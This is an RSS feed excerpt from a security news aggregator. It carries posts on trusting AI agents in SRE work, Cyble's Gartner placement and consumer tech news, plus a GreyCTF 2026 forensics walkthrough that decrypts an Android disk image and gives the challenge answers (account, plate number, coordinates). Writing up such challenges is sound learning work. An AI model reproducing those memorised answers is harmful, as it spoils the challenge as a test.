<p>The most forward-looking SRE leaders will not ask, “How quickly can we automate incident response?” They will ask, “What conditions must be true before our engineers feel safe delegating part of this workflow to a machine?” That is a much better question because it forces investment in the real foundations: observability, governance, evidence, workflow design and measurable trust.</p>



<p>AI agents may become standard in reliability engineering over the next few years, but standard does not mean automatic. The teams that benefit most will be the ones that treat trust as infrastructure. They will build it deliberately, test it relentlessly and expand autonomy only where the evidence justifies it.</p>



<h2 class="wp-block-heading">Closing thought</h2>



<p>Before SRE teams trust AI agents, they need more than a capable model. They need grounded telemetry, explicit guardrails, human-centered workflow design, explainable reasoning, rigorous evaluation and operational fit with the systems they already rely on. Only then does the promise of agentic SRE become credible.</p>



<p>That is the real frontier. Not autonomous operations for their own sake, but reliable collaboration between humans and intelligent systems. In the end, SRE teams will trust AI agents for the same reason they trust any production system: because it behaves predictably, shows its work, respects constraints and makes the organization more resilient when it matters most .</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyble Recognized in the 2026 Gartner® Magic Quadrant™ for Cyberthreat Intelligence Technologies — and What Cyble Feels It Means for the Next Era of Threat Intel]]></title>
<description><![CDATA[This morning, Cyble was recognized in the 2026 Gartner® Magic Quadrant™ for Cyberthreat Intelligence Technologies as a Challenger. 


I want to use this post for two things. First, to thank the people who got us here. Second, to share what we believe this recognition actually signals — because th...]]></description>
<link>https://tsecurity.de/de/3589989/it-security-nachrichten/cyblerecognized-in-the-2026-gartner-magic-quadrant-forcyberthreat-intelligence-technologies-andwhatcyblefeelsitmeans-for-the-next-era-of-threat-intel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589989/it-security-nachrichten/cyblerecognized-in-the-2026-gartner-magic-quadrant-forcyberthreat-intelligence-technologies-andwhatcyblefeelsitmeans-for-the-next-era-of-threat-intel/</guid>
<pubDate>Thu, 11 Jun 2026 11:24:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://cyble.com/wp-content/uploads/2026/05/Gartner-MQ-featured.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Gartner® Magic Quadrant™" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/05/Gartner-MQ-featured.webp 1920w, https://cyble.com/wp-content/uploads/2026/05/Gartner-MQ-featured-300x169.webp 300w, https://cyble.com/wp-content/uploads/2026/05/Gartner-MQ-featured-1024x576.webp 1024w, https://cyble.com/wp-content/uploads/2026/05/Gartner-MQ-featured-768x432.webp 768w, https://cyble.com/wp-content/uploads/2026/05/Gartner-MQ-featured-1536x864.webp 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Cyble Recognized in the 2026 Gartner® Magic Quadrant™ for Cyberthreat Intelligence Technologies — and What Cyble Feels It Means for the Next Era of Threat Intel 9"></p>
<p><!-- wp:paragraph --></p>
<p>This morning, Cyble was recognized in the 2026 Gartner® Magic Quadrant™ for <strong>Cyberthreat Intelligence Technologies</strong> as<strong> a</strong> <strong>Challenger</strong>. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>I want to use this post for two things. First, to thank the people who got us here. Second, to share what we believe this recognition actually signals — because the more interesting story isn’t about Cyble at all. It’s about where this category is going. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>A milestone for us, not a finish line</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Six years ago, when we started Cyble, the threat intelligence market was a fragmented mix of feed aggregators, <a class="wpil_keyword_link" href="https://cyble.com/solutions/dark-web-monitoring/" target="_blank" rel="noopener" title="Dark Web and Deep Web Monitoring Tools, Solutions, and Platforms" data-wpil-keyword-link="linked" data-wpil-monitor-id="32003">dark web monitoring</a> point tools, and incident-response heritage vendors trying to retrofit themselves into a different decade. We saw a different future: one where intelligence is AI-native by default, unified across the surface and <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-the-dark-web/" target="_blank" rel="noopener" title="What is the Dark Web? 2026" data-wpil-keyword-link="linked" data-wpil-monitor-id="32006">dark web</a>, delivered straight into the SOC workflow, and built for the speed adversaries actually move. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We bet on that future hard. Today, several organizations across 50+ countries trust us to run that vision in production. And today, Gartner placed us in the Challengers Quadrant alongside what we believe are the most established names in the category. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For us, being named “a Challenger” isn’t a footnote. It’s a signal that Cyble is now operating at the level of the incumbents — with a sharper, AI-native foundation underneath. That’s the bet finally paying off in public. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>What we believe this recognition signals about the category</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Three things, in order of importance: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>1. The category has changed. The buyer has too.</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A decade ago, <a class="wpil_keyword_link" href="https://cyble.com/solutions/cyber-threat-intelligence/" target="_blank" rel="noopener" title="Best Threat Intelligence Solution | Strengthen Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="32005">threat intelligence</a> was a research function. It produced reports. Today, threat intelligence is an operational function. It produces actions. The teams winning in 2026 don’t have time for a 40-page weekly bulletin — they need a platform that triages noise into signal at AI-speed and pipes it into the workflows their analysts already use. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>As we see it, the Magic Quadrant reflects that shift. The vendors moving up are the ones investing in operational depth, not just content depth. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>2. Unified beats fragmented. Always.</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The most consistent feedback we hear from CISOs is that they’re tired of stitching five tools together to investigate one threat. Dark web in one console. Brand monitoring in another. Attack surface somewhere else. Vulnerability prioritization in a fourth. Executive protection bolted on as an afterthought. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble’s bet from day one: this should be one platform. One workbench. One source of truth for everything happening outside your perimeter. The market is finally catching up to that thesis, and the analyst community is recognizing it. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>3. AI in CTI is past the demo phase.</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Three years ago, “AI in threat intelligence” mostly meant “we used a model to cluster keywords.” Today, AI is doing the work — translating a Russian-language forum post into context-rich intelligence, correlating leaked credentials with actual customer accounts in real time, predicting which CVEs will be weaponized in the next 30 days. Our customers run this in production, every day. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We feel the Magic Quadrant recognition is, in part, recognition that this work is real now. It’s not a slide. It’s running in your SOC. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>What it doesn’t mean</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>A few things I want to be careful about, because moments like this can encourage overstatement: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>This recognition is not an endorsement. Gartner does not endorse vendors. The Magic Quadrant is a research opinion, not a buying recommendation. If you’re a security leader making a CTI decision, please do the diligence you’d do anyway — POCs, customer references, hands-on evaluation against your real use cases. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>We are a Challenger, not a Leader. We’re proud of where we are positioned. We’re also clear-eyed about why we believe so: Leaders typically reflect a longer market tenure and broader feature surface, both of which compound with time. We have work ahead of us, and we know exactly where. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>A quadrant placement doesn’t change a single threat in your environment. The work is still the work. Adversaries don’t read research reports. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>What we owe the people who got us here</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>This is the part I care about most. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>To our customers: thank you. Every conversation about triage speed, dark web visibility, and SOC integration shaped what we built. You pushed us harder than any roadmap process ever could. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>To the Cyble team — every researcher, engineer, designer, CSM, seller, partner manager, ops person, recruiter — this milestone is yours. I get to write the blog post. You did the work. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>To the analysts and the broader research community: thank you for taking the time to understand what we’re building. The rigor in this category is what makes it credible. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>What’s next</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Three things you can expect from Cyble in the next 12 months: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list {"ordered":true,"start":1} --></p>
<ol start="1" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Deeper AI capabilities</strong> in the analyst workbench — predictive prioritization, automated investigation, language coverage in regions where adversaries are getting harder to track. </li>
<p><!-- /wp:list-item --></p></ol>
<p><!-- /wp:list --></p>
<p><!-- wp:list {"ordered":true,"start":2} --></p>
<ol start="2" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Tighter SOC integration</strong>, including expanded native connectors and better evidence handoffs into your detection-engineering and IR workflows. </li>
<p><!-- /wp:list-item --></p></ol>
<p><!-- /wp:list --></p>
<p><!-- wp:list {"ordered":true,"start":3} --></p>
<ol start="3" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Broader category coverage</strong> — third-party risk, executive protection, <a class="wpil_keyword_link" href="https://cyble.com/solutions/brand-intelligence/" target="_blank" rel="noopener" title="Brand Intelligence" data-wpil-keyword-link="linked" data-wpil-monitor-id="32004">brand intelligence</a> — all delivered in one pane of glass, not bolted on. </li>
<p><!-- /wp:list-item --></p></ol>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>And in 18 months, we plan to be a different name on a different part of the quadrant. That’s the work. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If you want to read the report, we’ve made a complimentary copy available here: Access the report <strong><a href="https://cyble.com/cyble-named-a-challenger-in-the-2026-gartner-magic-quadrant-for-cyberthreat-intelligence-technologies/">here</a></strong>. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If you want to talk about what this means for your CTI program, contact our team, <a href="https://cyble.com/request-demo/"><strong>here</strong></a>. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>To everyone who’s been part of this journey — customers, Cyblers, partners, analysts — thank you. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We’re just getting started. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>— Beenu Arora Co-Founder &amp; CEO, Cyble </strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph {"fontSize":"small"} --></p>
<p class="has-small-font-size"><em>Gartner, Magic Quadrant for Cyber Threat Intelligence Technologies, Jonathan Nunez, Carlos De Sola Caraballo, Jaime Anderson, May 4, 2026.</em> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph {"fontSize":"small"} --></p>
<p class="has-small-font-size"><em>Gartner and Magic Quadrant are trademarks of Gartner, Inc. and/or its affiliates.</em> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph {"fontSize":"small"} --></p>
<p class="has-small-font-size"><em>Gartner does not endorse any company, vendor, product or service depicted in its publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner publications consist of the opinions of Gartner’s business and technology insights organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this publication, including any warranties of merchantability or fitness for a particular purpose.</em> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/gartner-magic-quadrant-2026/">Cyble Recognized in the 2026 Gartner® Magic Quadrant™ for Cyberthreat Intelligence Technologies — and What Cyble Feels It Means for the Next Era of Threat Intel</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quote of the day by SpaceX CEO Elon Musk: "If you go back say, 300 years, the things we take for granted today, you'd be burned at stake for" — echoes of science fiction]]></title>
<description><![CDATA[Elon Musk reflects on advances we've made in the 21st century and how, in times gone past, they would be considered "indistinguishable from magic"]]></description>
<link>https://tsecurity.de/de/3589042/it-nachrichten/quote-of-the-day-by-spacex-ceo-elon-musk-if-you-go-back-say-300-years-the-things-we-take-for-granted-today-youd-be-burned-at-stake-for-echoes-of-science-fiction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589042/it-nachrichten/quote-of-the-day-by-spacex-ceo-elon-musk-if-you-go-back-say-300-years-the-things-we-take-for-granted-today-youd-be-burned-at-stake-for-echoes-of-science-fiction/</guid>
<pubDate>Thu, 11 Jun 2026 00:02:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elon Musk reflects on advances we've made in the 21st century and how, in times gone past, they would be considered "indistinguishable from magic"]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor Magic V6 review: A mechanical marvel]]></title>
<description><![CDATA[There's a lot of impressive engineering inside Honor's Magic V6, but it's let down by software that desperately needs polish.]]></description>
<link>https://tsecurity.de/de/3588143/it-nachrichten/honor-magic-v6-review-a-mechanical-marvel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588143/it-nachrichten/honor-magic-v6-review-a-mechanical-marvel/</guid>
<pubDate>Wed, 10 Jun 2026 17:20:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[There's a lot of impressive engineering inside Honor's Magic V6, but it's let down by software that desperately needs polish.]]></content:encoded>
</item>
<item>
<title><![CDATA[NordVPN lands on Meta Horizon — and VR privacy just got a whole lot easier]]></title>
<description><![CDATA[NordVPN is the third VPN to enter the metaverse, letting Quest users install a full VPN directly on their headset to encrypt traffic and mask their IP in VR.]]></description>
<link>https://tsecurity.de/de/3584274/it-nachrichten/nordvpn-lands-on-meta-horizon-and-vr-privacy-just-got-a-whole-lot-easier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584274/it-nachrichten/nordvpn-lands-on-meta-horizon-and-vr-privacy-just-got-a-whole-lot-easier/</guid>
<pubDate>Tue, 09 Jun 2026 13:17:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NordVPN is the third VPN to enter the metaverse, letting Quest users install a full VPN directly on their headset to encrypt traffic and mask their IP in VR.]]></content:encoded>
</item>
<item>
<title><![CDATA[GreyCTF 2026  —  Crimewatch Forensics Challenge Writeup]]></title>
<description><![CDATA[GreyCTF 2026 — Crimewatch Forensics Challenge WriteupHi, I’m glad to share with you my writeup for solving a Forensics Challenge called “Crimewatch” in GreyCTF 2026You can read this writeup on my GitBook: LinkWe are provided with 2 weird files named "a" and "b", and a python file as shown:the bel...]]></description>
<link>https://tsecurity.de/de/3583945/hacking/greyctf-2026-crimewatch-forensics-challenge-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583945/hacking/greyctf-2026-crimewatch-forensics-challenge-writeup/</guid>
<pubDate>Tue, 09 Jun 2026 11:09:03 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>GreyCTF 2026 — Crimewatch Forensics Challenge Writeup</h3><h4>Hi, I’m glad to share with you my writeup for solving a Forensics Challenge called “<strong>Crimewatch</strong>” in GreyCTF 2026</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/498/1*HMDjKb_-kh8tWzwAoToVVw.png"></figure><blockquote>You can read this writeup on my GitBook: <a href="https://prankster.gitbook.io/prankster/ctf-writeups/greyctf-2026-crimewatch-forensics-challenge-writeup">Link</a></blockquote><p>We are provided with 2 weird files named <strong>"a"</strong> and <strong>"b"</strong>, and a python file as shown:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/541/1*UI1zDr12q0AjS0ipDWPj2A.png"></figure><p>the below screen shows the conclusion for <strong>flag.py</strong> file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CFRP-z_Pa5e4eUONSC11RA.png"></figure><p>so, we are provided with weird files, we need to determine what are these format.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/623/1*SYQAd0jRU-jVP5aWTO0KQA.png"></figure><p>So with HxD and a little research, i could determine that this magic bytes are <a href="https://en.wikipedia.org/wiki/Qcow"><strong><em>qcow</em></strong></a><strong><em> </em></strong>file format, which stands for “QEMU <a href="https://en.wikipedia.org/wiki/Copy-on-write"><em>Copy On Write</em></a>”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zOr8cC0PdcZ44Ds16bos6Q.png"></figure><p>So it’s a qemu disk images, but both files are just unallocated space on FTK</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/871/1*cjfg6QChM6-cz2IfqvRGUQ.png"></figure><p>So, we need to convert them to a readable disk images to open properly.<br>After a little research i found this tool: <a href="https://cloudbase.it/qemu-img-windows/"><strong><em>qemu-img</em></strong></a><strong><em> </em></strong><em>, so let’s try this tool</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/562/1*W8SNZA1AHwd0kE6Vt2OnDg.png"></figure><p>now we need to convert them</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/739/1*x48aS9zjHkd7wzylBg7D5g.png"></figure><p>after conversion, we could open on FTK Imager</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/865/1*fPnSI6yoEmDCsZVcjytkGg.png"></figure><p>only the b disk image opened properly. after a long research and a very long chats with different AI models :), i was able to cofirm that <strong>a </strong>is Android FBE-encrypted userdata and <strong>b </strong>is the metadata partition needed to decrypt <strong>a.<br></strong>finally i found an amazing tool: <a href="https://github.com/SlugFiller/fbe-decrypt"><strong><em>fbe-decrypt</em></strong></a><strong><em> </em></strong><em>, now let’s work to decrypt </em><strong>a</strong><em>.</em></p><p>We just need to rename the files with the intended names based n the script to could run perfectly.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*Jl_Zrxii9qgxNHjIOsF1Jg.png"></figure><p>And now we can run and see the precious output here<br><strong><em>NOTE: First, you will need to install NodeJS</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/675/1*a7Zx-PvS804PDvE-7etJJQ.png"></figure><p>Now we can investigate the disk image properly on FTK with no issues</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/488/1*tLG2v4M8DgbB5JzoZw32aA.png"></figure><p>Now, Let’s head back to the python script and start real investigation.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OW3vB8vGcreo2m3QoBKqrA.png"></figure><p>After walking around and deep searching, i found a very important note on the notifications file located in: <strong>/system_ce/0/notification_history/notification_history.xml</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pyB09eevffvRTAWjKx_Uag.png"></figure><p>now i got 2 answers directly, and one glance for the third <br>first: telechat account is: <strong>@vanta_supply<br></strong>second glance: plate numbers maybe starts or ends or contains:<strong>..SG673..<br></strong>third: the buyer we suspect is: <strong>jiawei</strong></p><p>After a long digging also, found this amazing picture located in: <br><strong>/media/0/Pictures/TeleChat/IMG_20260514_164900.png</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*H1lqiUP6Mi9xKuQSweMltQ.png"></figure><p>Now we got the full car plate number: <strong>SG67301K <br></strong>Now for the tricky part, the last question needs the coordinates to identify the pickup point.</p><p>There’s another image in the directory called <strong>spot.jpg</strong>, i guess it’s a clue</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*z_8-dwqAYqcRs0mleikx6A.png"></figure><p>that’s a big clue and its called spot, so let’s get the exact coordinates.</p><p>wanna do a big shoutout to my friend <a href="https://medium.com/u/ac33a41637dc">7h3kn0w3r</a> for helping me get the exact coordinates</p><p>Found exactly the same view on different platforms such as: <a href="https://www.alamy.com/singapore-circa-2018-lilly-pads-in-a-pond-bathed-in-evening-light-and-ripples-in-the-famous-botanic-gardens-singapore-as-nature-background-with-sp-image364466725.html?imageid=20FB8FFE-CD80-4AE7-BD8D-CB76B424D378&amp;pn=1&amp;searchId=9dfd5025a12e0c6d90aafd31c6a327f2&amp;searchtype=9"><strong><em>alamy</em></strong></a><strong><em> </em></strong>and facebook post <a href="https://www.facebook.com/taste.travel.tell/posts/pfbid02Y19yKHTmRgV9RAp565uadeY9ao7Lvkv2FcG2ZKf1qw3TB9egGbRvzky7icKSnfSul?rdid=EqrEte4tCNofUbYD#"><strong><em>here</em></strong></a><strong><em> </em></strong>, and finally found a good person on <a href="https://www.flickr.com/photos/dannyfoster/9511153795"><strong><em>flickr</em></strong></a><strong><em> </em></strong>posted the exact image with the exact location here: <a href="https://www.flickr.com/map/?fLat=1.401333&amp;fLon=103.794833&amp;zl=13&amp;everyone_nearby=1&amp;photo=9511153795"><em>https://www.flickr.com/map/?fLat=1.401333&amp;fLon=103.794833&amp;zl=13&amp;everyone_nearby=1&amp;photo=9511153795</em></a><strong><em> </em></strong>, so i got it from the url itself. <br>getting the exact coordinates on google maps <a href="https://www.google.com/maps/place/1%C2%B024'04.8%22N+103%C2%B047'41.4%22E/@1.4013335,103.794792,3a,49.3y,143.02h,78.5t/data=!3m7!1e1!3m5!1s0_5Ju7VRToOB7wcSw5aNiA!2e0!6shttps:%2F%2Fstreetviewpixels-pa.googleapis.com%2Fv1%2Fthumbnail%3Fcb_client%3Dmaps_sv.tactile%26w%3D900%26h%3D600%26pitch%3D11.502224645524834%26panoid%3D0_5Ju7VRToOB7wcSw5aNiA%26yaw%3D143.01629719088223!7i13312!8i6656!4m4!3m3!8m2!3d1.401333!4d103.794833?entry=ttu&amp;g_ep=EgoyMDI2MDUyNy4wIKXMDSoASAFQAw%3D%3D"><strong><em>HERE</em></strong></a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xsf-trmxBUGVNvrdjk7Usw.png"></figure><h4>So Let’s Get the FLAG</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tODJDLXuF0t-q0t0_KDfrQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/494/1*EBtcA-TB_PALp2QTS8PTjQ.png"></figure><h4>Thanks For Reading, Hope you enjoyed❤️</h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=287437ccb79f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/greyctf-2026-crimewatch-forensics-challenge-writeup-287437ccb79f">GreyCTF 2026  —  Crimewatch Forensics Challenge Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Liquid Glass customization & better Apple Intelligence arrive with iPadOS 27]]></title>
<description><![CDATA[Apple's latest AI upgrades are coming to every part of the ecosystem, including iPadOS 27, where Apple also focused on system optimizations and Liquid Glass changes.iPadOS 27 brings changes to Liquid GlassWWDC has already promised Apple Intelligence announcements, but there are new features for e...]]></description>
<link>https://tsecurity.de/de/3582300/ios-mac-os/liquid-glass-customization-better-apple-intelligence-arrive-with-ipados-27/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582300/ios-mac-os/liquid-glass-customization-better-apple-intelligence-arrive-with-ipados-27/</guid>
<pubDate>Mon, 08 Jun 2026 19:37:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's latest AI upgrades are coming to every part of the ecosystem, including <a href="https://appleinsider.com/inside/ipados-27" title="iPadOS 27" data-kpt="1">iPadOS 27</a>, where Apple also focused on system optimizations and Liquid Glass changes.<div><img src="https://photos5.appleinsider.com/gallery/67802-143053-iPad-Pro-Magic-Keyboard-table-xl.jpg" alt="Tablet with colorful app icons sits on a keyboard case on a wooden table, in a softly lit room with bright windows blurred in the background" height="738"><br><span>iPadOS 27 brings changes to Liquid Glass</span></div><br><a href="https://appleinsider.com/inside/wwdc" title="WWDC" data-kpt="1">WWDC</a> has already promised <a href="https://appleinsider.com/inside/apple-intelligence" title="Apple Intelligence" data-kpt="1">Apple Intelligence</a> announcements, but there are new features for each OS coming too. The <a href="https://appleinsider.com/inside/ipad" title="iPad" data-kpt="1">iPad</a> will get <a href="https://appleinsider.com/inside/ios-27" title="iOS 27" data-kpt="1">iOS 27</a> features in addition to what has been revealed in iPadOS 27.<br><br>Apple has only just announced iPadOS 27, so keep refreshing for more details as they become available.<br><br>The multitasking system has seen repeated changes in recent years, especially since Stage Manager didn't quite solve the problems with the platform. The windowing system in <a href="https://appleinsider.com/inside/ipados-26" title="iPadOS 26" data-kpt="1">iPadOS 26</a> was much better, and iPadOS 27 builds upon that further with system-wide optimizations.<br><br><br> <a href="https://appleinsider.com/articles/26/06/08/liquid-glass-customization-better-apple-intelligence-arrive-with-ipados-27?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244569?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jeff Bezos Is Funding a Wild Hunt for the Brain's 'Core Algorithm']]></title>
<description><![CDATA[Jeff Bezos is backing Flourish, a new "neuro AI" startup with $500 million in funding and a reported $2.5 billion valuation, that aims to reinvent AI by studying the brain's architecture and building systems that learn continuously while using far less power than today's large language models. Th...]]></description>
<link>https://tsecurity.de/de/3581843/it-security-nachrichten/jeff-bezos-is-funding-a-wild-hunt-for-the-brains-core-algorithm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581843/it-security-nachrichten/jeff-bezos-is-funding-a-wild-hunt-for-the-brains-core-algorithm/</guid>
<pubDate>Mon, 08 Jun 2026 17:07:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jeff Bezos is backing Flourish, a new "neuro AI" startup with $500 million in funding and a reported $2.5 billion valuation, that aims to reinvent AI by studying the brain's architecture and building systems that learn continuously while using far less power than today's large language models. The company's long-term bet is that neuroscientists and AI researchers working together can uncover the brain's "core algorithm" and eventually create brain-inspired AI that runs on a tiny fraction of current compute. Wired reports: Rob Williams knows how to pitch Jeff Bezos: You write a press release as if your product has already been built. Bezos reads it and gives a thumbs up or down. Williams went through this process a lot as an executive on Amazon's "S-team," in charge of software products such as Alexa, until his departure last fall. But the pitch he made a few weeks later -- in December 2025 -- was different. Now he was collaborating with Thomas Reardon, a neuroscientist and repeat startup founder, and approaching Bezos as a funder, not a boss. Here's what Bezos, sitting on his yacht somewhere, read while Williams anxiously watched on Zoom: "Flourish is a neuro AI company that is solving the two most difficult problems facing AI today: power efficiency and continuous learning. We are building Cortex AI, the first synthetic intelligence system designed to match the computational capacity, learning efficiency, and power budget of the human brain."
 
A month later, I'm lunching with Reardon and Williams in the Flatiron neighborhood in New York City. Reardon gets right to the point. AI has dug itself into a hole, he says. Though increasingly powerful, large language models are greedy consumers of computer power and data. Though the inspiration for LLMs was rooted in biology, current frontier models have little in common with the human brain. A person uses about 20 watts of energy to process information; a single chip in an AI training cluster uses more than 30 times that amount. The hyperscalers require thousands of chips and gigawatts of energy, enough to power small cities. And those models need to suck up virtually all of what humans have written. Each new model requires more, more, more. For all of that, the models don't learn. Once you train them, they're stuck. The goal, Reardon tells me, is to build "a synthetic artificial intelligence brain that runs on 50 watts or less." It should adapt to its conditions, be as nimble as a human mind, and burn a tiny fraction of an LLM's compute power and energy. The proof of concept is thriving inside our skulls. "There's something fundamentally wrong with saying, "I need to basically read every book ever written 20 times over in order to learn English,'" Reardon says. "A human baby does it with a couple hundred thousand utterances."
 
Reardon and Williams haven't figured out yet how to build systems that match the magic of a human brain. What they have is a belief that an expert, well-resourced team -- of AI researchers and neuroscientists working essentially side by side -- can find the answer. The neuroscientists will conduct original wet lab experiments with some of the most advanced lab equipment available, to hunt for usable intel on the brain's architecture. They plan to release the models they're currently developing as near-term products on the path to a full reinvention of AI. The fuzziness of the proposal didn't bother Jeff Bezos. After reading Williams' two-pager, he chipped in $50 million. Other funding came from Lux Capital, Google Ventures, and Catalio, among others. Bezos then almost doubled his initial stake and told Reardon he'd have given more if they'd asked. Now with a war chest of $500 million and a reported valuation of $2.5 billion, Flourish just needs to invent a new way to do AI.<p></p><div class="share_submission">
